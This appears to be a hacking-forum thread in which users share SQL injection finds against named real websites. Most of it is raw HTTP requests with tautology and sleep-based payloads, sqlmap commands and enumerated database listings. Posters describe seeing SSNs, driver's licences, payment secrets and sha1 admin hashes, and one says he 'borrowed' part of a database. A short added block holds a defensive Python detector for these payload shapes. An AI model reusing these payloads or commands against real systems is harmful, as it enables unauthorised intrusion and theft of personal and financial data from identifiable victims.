
Interesting SQL inj & XSS finds

Rather than push my own opinion, I'll refer to the official sqlmap FAQ:


The sqlmap authors take the view that the user should work out, with their own hands and head, which bypass they need. Once they understand that they can get past the WAF, they can calmly pick a suitable tamper from the list provided, or write their own if there isn't one. You need to find what the WAF is catching on. As it stands, it's poking a finger at the sky without knowing all the parameters.
 
POST /personal/F_pass.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://grouper.world-link.org/personal/fgPW.php
Content-Length: 233
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: grouper.world-link.org
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="account"

-1' OR 3*2*1=6 AND 00070=00070 -- 
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"

testing@example.com
------------YWJkMTQzNDcw--
 
POST /hrm/models/erecruit_model.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://www.acbf-pact.org/
Cookie: SSESS9b5413b684f50918a23fde1137d8a097=kxwoUdYIj8Bw4S7KZgYar-pKC_uSLDe_RstjThG6YlM
Content-Length: 366
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: www.acbf-pact.org
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="Method"

upload_doc
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fu_certificate_one"; filename="@@2CLD7"
Content-Type: image/png


------------YWJkMTQzNDcw
Content-Disposition: form-data; name="hd_attribute"

-1' OR 3*2*1=6 AND 000151=000151 --
------------YWJkMTQzNDcw--
 
POST /home/services/fgpw_sent.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://www.siamcomic.com/home/services/fgpw.php
Cookie: PHPSESSID=v74ljljquq56om9ff1aomk3tu6
Content-Length: 169
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: www.siamcomic.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="contactmail"

testing@example.com0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
------------YWJkMTQzNDcw--
 
GET /show_add.php?id_add=(select(0)from(select(sleep(9.272)))v)/*'%2B(select(0)from(select(sleep(9.272)))v)%2B'"%2B(select(0)from(select(sleep(9.272)))v)%2B"*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://46.151.215.12/frgt.php
Cookie: PHPSESSID=ea3f7a15c87a8a1aea2742b5081bb710
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: 46.151.215.12
Connection: Keep-alive
 
POST /eis/forgot.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www.eutaw.us/eis/forgot.php
Cookie: PHPSESSID=5cfm5mfvu56j3omd5sn5rsdj04
Content-Length: 78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: www.eutaw.us
Connection: Keep-alive

birthday=-1'%20OR%203*2*1=6%20AND%20000871=000871%20--%20&sin=u]H[ww6KrA9F.x-F



---------------------------------------------------
around 10k employees. sqlmap sees a union here. there are so many tables that I simply got worn out looking for SSNs. definitely saw DOBs and DLs in there. didn't touch anything
 
GET /products.php?id=-1'%20OR%203*2*1=6%20AND%20000725=000725%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.neutronics.co.in/products.php?id=7
Cookie: PHPSESSID=c415b756b242d02ba131014235065656; humans_21909=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: www.neutronics.co.in
Connection: Keep-alive
 
GET /quote-form.php?pid=-1'%20OR%203*2*1=6%20AND%2000067=00067%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://dicoproducts.com/products.php?pid=7600500
Cookie: PHPSESSID=hcjdvch2fughogbeddem6bthe0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: dicoproducts.com
Connection: Keep-alive
 
POST /search.php HTTP/1.1
Referer: https://www.zazprodukte.de/products.php?id=1
Cookie: PHPSESSID=mrit9mbfbsb40g6g18f1g7spq3; i_agree=yes; googtrans=/en/ja; googtrans=/en/ja
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: www.zazprodukte.de
Connection: Keep-alive

keyword=1'"
 
GET /product.php?id=-1'%20OR%203*2*1=6%20AND%20000749=000749%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://crownindustries.co.in/product.php?id=43
Cookie: PHPSESSID=6vsb6ld0b3r2i8au7f57siaom1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: crownindustries.co.in
Connection: Keep-alive
 
GET /tag.php?id=(select(0)from(select(sleep(12.322)))v)/*'%2B(select(0)from(select(sleep(12.322)))v)%2B'"%2B(select(0)from(select(sleep(12.322)))v)%2B"*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.iqboard.net/product-list.php?id=7
Cookie: twk_idm_key=3UbwppY5MEUsIHNfjSxyc; TawkConnectionTime=0; twk_uuid_5ca31cf01de11b6e3b066438=%7B%22uuid%22%3A%221.70hVrrNFHz8fPuCgpdlkmgI2JQROHkJvzNcbDtCtSrscPVQIrGiT3MDIVkRW0MJ30DoGoWZ8Pdy76B4dKIz9CkPEefNjyPd5lwLKAwMJs0mFs2jXgf7J%22%2C%22version%22%3A3%2C%22domain%22%3A%22iqboard.net%22%2C%22ts%22%3A1720053370589%7D; cookieyes-consent=consentid:ZHMyZXpoUWlGRUxTMHoxQ0RUc3lsYXJlWGJQZGNXbU4,consent:yes,action:yes,necessary:yes,functional:yes,analytics:yes,performance:yes,advertisement:yes
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: www.iqboard.net
Connection: Keep-alive
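The requests above repeat three payload shapes: the `OR 3*2*1=6 AND n=n --` tautology, the `sleep()` delay inside a subselect, and the `XOR(if(now()=sysdate(),sleep(),0))` conditional delay. The detector below flags those shapes in URL-decoded parameter values from an access log. It is an added example written for this page, not code from the thread; the sample log lines are constructed and the hosts and paths in them are placeholders.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the three injection shapes that recur in the requests above.
# Each regex runs against the URL-decoded value of a single parameter.
SIGNATURES = [
    ("tautology-comment", re.compile(r"\bOR\b.+?=\s*\d+\s+AND\s+\d+=\d+\s*--", re.I)),
    ("time-based-sleep", re.compile(r"\bsleep\s*\(\s*\d+(?:\.\d+)?\s*\)", re.I)),
    ("xor-conditional-delay", re.compile(r"\bXOR\s*\(\s*if\s*\(", re.I)),
]


def decode_params(raw: str) -> dict:
    """Split a query string or x-www-form-urlencoded body into decoded name/value pairs."""
    params = {}
    for pair in raw.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")  # value keeps any further '=' (e.g. 3*2*1=6)
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def scan_params(params: dict) -> dict:
    """Map each suspicious parameter name to the sorted labels of the signatures it triggers."""
    hits = {}
    for name, value in params.items():
        labels = sorted(label for label, rx in SIGNATURES if rx.search(value))
        if labels:
            hits[name] = labels
    return hits


def scan_query(target: str) -> dict:
    """Scan the query string of a request target such as '/products.php?id=...'."""
    _, _, query = target.partition("?")
    return scan_params(decode_params(query))


if __name__ == "__main__":
    # Constructed access-log style lines; hosts/paths are placeholders, not the thread's targets.
    SAMPLE_LOG = [
        "GET /products.php?id=-1'%20OR%203*2*1=6%20AND%20000725=000725%20--%20 HTTP/1.1",
        "GET /tag.php?id=(select(0)from(select(sleep(12.322)))v)/*'%2B(select(0)from(select(sleep(12.322)))v)%2B'*/ HTTP/1.1",
        "GET /products.php?id=7 HTTP/1.1",
    ]
    for line in SAMPLE_LOG:
        method, target, _ = line.split(" ", 2)
        print(method, target[:40], scan_query(target) or "clean")
```

POST bodies go through `scan_params(decode_params(body))` directly; multipart bodies need their parts extracted first, which this example does not do.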
 
sqlmap -u 'https://www.commonfolks.in/ajaxfunctions/getAuthorInFocus?id=*' --random-agent --technique=U --batch --threads=10 --dbs

A shop. Indians. 200k visits a month. Some s3 secret in the database, looks like Stripe or something like that. Also some paypal column
 
sqlmap -u "https://www.toppartika.lv/tip-top-produkti/?search=" --dbs --level 5 --risk 3 --random-agent --batch --threads=10 --technique=T --time-sec=3

available databases [4]:
[] admin
[] information_schema
[] toppartika
[] toppartika_pipar

toppartika: contents
[16:52:24] [INFO] resumed: 33
[16:52:24] [INFO] resumed: about
[16:52:24] [INFO] resumed: access
[16:52:24] [INFO] resumed: admin_menu_sort
[16:52:24] [INFO] resumed: admin_tds
[16:52:24] [INFO] resumed: admins
[16:52:24] [INFO] resumed: akcijas
[16:52:24] [INFO] resumed: blocks
[16:52:24] [INFO] resumed: calendar
[16:52:24] [INFO] resumed: cooks
[16:52:24] [INFO] resumed: cooks_recipes
[16:52:24] [INFO] resumed: files
[16:52:24] [INFO] resumed: gps
[16:52:24] [INFO] resumed: groups
[16:52:24] [INFO] resumed: ln
[16:52:24] [INFO] resumed: news
[16:52:24] [INFO] resumed: partners
[16:52:24] [INFO] resumed: pic
[16:52:24] [INFO] resumed: products
[16:52:24] [INFO] resumed: products_categories
[16:52:24] [INFO] resumed: regions
[16:52:24] [INFO] resumed: regions_novs
[16:52:24] [INFO] resumed: sales
[16:52:24] [INFO] resumed: sales_periods
[16:52:24] [INFO] resumed: seo
[16:52:24] [INFO] resumed: seopages
[16:52:24] [INFO] resumed: seosettings
[16:52:24] [INFO] resumed: shops
[16:52:24] [INFO] resumed: slides
[16:52:24] [INFO] resumed: staff
[16:52:24] [INFO] resumed: top
[16:52:24] [INFO] resumed: top_log
[16:52:24] [INFO] resumed: txt
[16:52:24] [INFO] resumed: vacancies
[16:52:24] [INFO] resumed: 8
[16:52:24] [INFO] resumed: id
[16:52:24] [INFO] resumed: url
[16:52:24] [INFO] resumed: post

admin: email, pass in sha1
 
33 columns in 1 second with technique=T? is that some kind of script kiddie protection?
 
33 columns in 1 second with technique=T? is that some kind of script kiddie protection?
no, it's more like I checked it 2 days ago and borrowed part of the database, and now I entered the command so that everything would be displayed, since I didn't save the output)
 

